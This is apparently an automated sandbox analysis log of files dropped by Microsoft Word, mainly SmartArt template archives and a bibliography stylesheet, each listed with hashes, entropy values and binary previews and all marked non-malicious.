                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):5783
                                                  Entropy (8bit):7.88616857639663
                                                  Encrypted:false
                                                  SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                  MD5:8109B3C170E6C2C114164B8947F88AA1
                                                  SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                  SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                  SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                  Malicious:false
                                                  Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):238
                                                  Entropy (8bit):3.472155835869843
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                  MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                  SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                  SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                  SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):5151
                                                  Entropy (8bit):7.859615916913808
                                                  Encrypted:false
                                                  SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                  MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                  SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                  SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                  SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                  Malicious:false
                                                  Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):260
                                                  Entropy (8bit):3.4895685222798054
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                  MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                  SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                  SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                  SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):3075
                                                  Entropy (8bit):7.716021191059687
                                                  Encrypted:false
                                                  SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                  MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                  SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                  SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                  SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                  Malicious:false
                                                  Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):16806
                                                  Entropy (8bit):7.9519793977093505
                                                  Encrypted:false
                                                  SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                  MD5:950F3AB11CB67CC651082FEBE523AF63
                                                  SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                  SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                  SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                  Malicious:false
                                                  Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):254
                                                  Entropy (8bit):3.4720677950594836
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                  MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                  SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                  SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                  SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):333258
                                                  Entropy (8bit):4.654450340871081
                                                  Encrypted:false
                                                  SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                  MD5:5632C4A81D2193986ACD29EADF1A2177
                                                  SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                  SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                  SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):328
                                                  Entropy (8bit):3.541819892045459
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                  SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                  SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                  SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):252
                                                  Entropy (8bit):3.48087342759872
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                  MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                  SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                  SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                  SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):4326
                                                  Entropy (8bit):7.821066198539098
                                                  Encrypted:false
                                                  SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                  MD5:D32E93F7782B21785424AE2BEA62B387
                                                  SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                  SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                  SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                  Malicious:false
                                                  Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):260
                                                  Entropy (8bit):3.494357416502254
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                  MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                  SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                  SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                  SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):6193
                                                  Entropy (8bit):7.855499268199703
                                                  Encrypted:false
                                                  SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                  MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                  SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                  SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                  SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                  Malicious:false
                                                  Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):246
                                                  Entropy (8bit):3.5039994158393686
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                  MD5:16711B951E1130126E240A6E4CC2E382
                                                  SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                  SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                  SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):3683
                                                  Entropy (8bit):7.772039166640107
                                                  Encrypted:false
                                                  SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                  MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                  SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                  SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                  SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                  Malicious:false
                                                  Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):264
                                                  Entropy (8bit):3.4866056878458096
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                  MD5:6C489D45F3B56845E68BE07EA804C698
                                                  SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                  SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                  SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):6448
                                                  Entropy (8bit):7.897260397307811
                                                  Encrypted:false
                                                  SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                  MD5:42A840DC06727E42D42C352703EC72AA
                                                  SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                  SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                  SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                  Malicious:false
                                                  Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
